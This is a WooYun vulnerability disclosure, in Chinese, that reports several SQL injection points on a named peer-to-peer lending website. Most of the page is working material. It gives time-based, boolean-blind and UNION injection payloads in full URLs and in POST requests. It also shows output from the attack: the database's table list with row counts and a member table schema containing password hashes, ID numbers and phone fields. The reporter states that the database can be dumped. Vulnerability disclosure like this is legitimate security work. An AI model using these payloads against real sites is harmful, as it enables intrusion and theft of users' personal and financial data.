当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157945

漏洞标题:玖利人人互联网金融平台多处SQL注入漏洞

相关厂商:沈阳卓铭信息咨询有限公司

漏洞作者: 路人甲

提交时间:2015-12-05 02:28

修复时间:2016-01-19 02:30

公开时间:2016-01-19 02:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-05: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-19: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

sql注入

详细说明:

本次测试仅为证明漏洞存在。
SQL注入导致用户数据泄露。
存在多处注入点:
1.http://www.9libank.com/fund/index.html
问题参数:
hid_da1
hid_da2
hid_xiao1
hid_xiao2
val
GET型注入,Payload:

arameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: http://www.9libank.com:80/fund/index.html?hid_da1=all&hid_da2=if(now()=sysdate(),sleep(0),0)/-4599' OR 8993=8993 AND 'SHDH'='SHDH'XOR(if(now()=sysdate()
,sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/&hid_xiao1=15&hid_xiao2=365&slt=yes&sort=desc&type=2&val=max_interest
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://www.9libank.com:80/fund/index.html?hid_da1=all&hid_da2=if(now()=sysdate(),sleep(0),0)/' AND (SELECT * FROM (SELECT(SLEEP(5)))UCLy) AND 'WUvq'='WU
vq'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/&hid_xiao1=15&hid_xiao2=365&slt=yes&sort=desc&type=2&val=max_interest
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: http://www.9libank.com:80/fund/index.html?hid_da1=all&hid_da2=if(now()=sysdate(),sleep(0),0)/' UNION ALL SELECT NULL,NULL,CONCAT(0x717a6b7071,0x67596961
58536f74456f,0x7171786271),NULL,NULL-- 'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/&hid_xiao1=15&hid_xiao2=365&slt=yes&sort=desc&t
ype=2&val=max_interest
Parameter: #2* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (Generic comment)
    Payload: http://www.9libank.com:80/fund/index.html?hid_da1=all&hid_da2=if(now()=sysdate(),sleep(0),0)/-8020' OR 3079=3079-- /&hid_xiao1=15&hid_xiao2=365&slt=yes&
sort=desc&type=2&val=max_interest
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: http://www.9libank.com:80/fund/index.html?hid_da1=all&hid_da2=if(now()=sysdate(),sleep(0),0)/'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdat
e(),sleep(0),0))OR"' UNION ALL SELECT NULL,NULL,CONCAT(0x717a6b7071,0x4854584248506446544d,0x7171786271),NULL,NULL-- /&hid_xiao1=15&hid_xiao2=365&slt=yes&sort=desc&t
ype=2&val=max_interest
---


2.http://www.9libank.com/member/common/checkmobile.html
问题参数:mobile
POST注入

POST /member/common/checkmobile.html HTTP/1.1
Content-Length: 239
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.9libank.com/
Cookie: think_template=default; PHPSESSID=6f135ptk62kco1ogstkl2n3ii7; Hm_lvt_01daed71e5cc3567071149df8c9dc80d=1449118912,1449118917,1449118944,1449118971; Hm_lpvt_01daed71e5cc3567071149df8c9dc80d=1449118971; HMACCOUNT=8132A08E5C9DF6EB; BAIDUID=475C5A26242ACC9DE9D6E25399C38274:FG=1
Host: www.9libank.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
mobile=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&note=1&note_code=94102&__hash__=0bc8ddaa6a2b3e66fab58a36a092aa87_319aa6668263d83b1fac784cc6b28e59


3.http://www.9libank.com/pay/fundcart.html
问题参数:borrow_id
注入类型:POST注入

POST /pay/fundcart.html HTTP/1.1
Content-Length: 163
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.9libank.com/
Cookie: think_template=default; PHPSESSID=6f135ptk62kco1ogstkl2n3ii7; Hm_lvt_01daed71e5cc3567071149df8c9dc80d=1449118912,1449118917,1449118944,1449118971; Hm_lpvt_01daed71e5cc3567071149df8c9dc80d=1449118971; HMACCOUNT=8132A08E5C9DF6EB; BAIDUID=475C5A26242ACC9DE9D6E25399C38274:FG=1
Host: www.9libank.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
borrow_id=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&investor_capital=e

漏洞证明:

数据库信息:
Database: p2p
+-------------------------------+---------+
| Table                         | Entries |
+-------------------------------+---------+
| lzh_member_money              | 13092   |
| lzh_members                   | 9656    |
| lzh_member_fuyou              | 5425    |
| lzh_area                      | 3412    |
| lzh_auser_dologs              | 1034    |
| lzh_inner_msg                 | 743     |
| lzh_member_info               | 352     |
| lzh_transfer_borrow_investor  | 331     |
| lzh_member_address            | 293     |
| lzh_note_log                  | 263     |
| lzh_transfer_privilege_detail | 238     |
| lzh_xunbao_huojiang           | 205     |
| lzh_tqbj_getuser              | 122     |
| lzh_article                   | 92      |
| lzh_xunbao_choujiang          | 83      |
| lzh_cellnumber                | 29      |
| lzh_member_credit             | 19      |
| lzh_member_credit_company     | 19      |
| lzh_member_credit_info        | 19      |
| lzh_credit                    | 7       |
| lzh_transfer_borrow_info      | 7       |
| lzh_xunbao_jiangpin           | 5       |
| lzh_acl                       | 4       |
| lzh_ausers                    | 4       |
| lzh_global                    | 4       |
| lzh_tqbj_gift                 | 4       |
| lzh_article_category          | 3       |
+-------------------------------+---------+


Database: p2p
Table: lzh_members
[28 columns]
+-----------------+------------------------+
| Column          | Type                   |
+-----------------+------------------------+
| active_integral | int(15)                |
| credits         | int(10)                |
| customer_id     | int(10) unsigned       |
| customer_name   | varchar(20)            |
| id              | int(10) unsigned       |
| idcard          | varchar(55)            |
| integral        | int(15)                |
| invest_credits  | decimal(15,2) unsigned |
| is_ban          | int(11)                |
| is_borrow       | int(2)                 |
| is_transfer     | int(2)                 |
| is_vip          | tinyint(3)             |
| last_log_ip     | char(15)               |
| last_log_time   | int(10)                |
| pin_pass        | char(32)               |
| recommend_id    | int(10) unsigned       |
| recommend_phone | varchar(13)            |
| reg_ip          | varchar(15)            |
| reg_time        | int(10) unsigned       |
| reward_money    | decimal(15,2)          |
| true_name       | varchar(55)            |
| user_code       | varchar(28)            |
| user_email      | varchar(50)            |
| user_leve       | tinyint(4) unsigned    |
| user_name       | varchar(50)            |
| user_pass       | char(32)               |
| user_phone      | varchar(13)            |
| user_type       | tinyint(3) unsigned    |
+-----------------+------------------------+


可脱裤

修复方案:

全局过滤相关参数

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝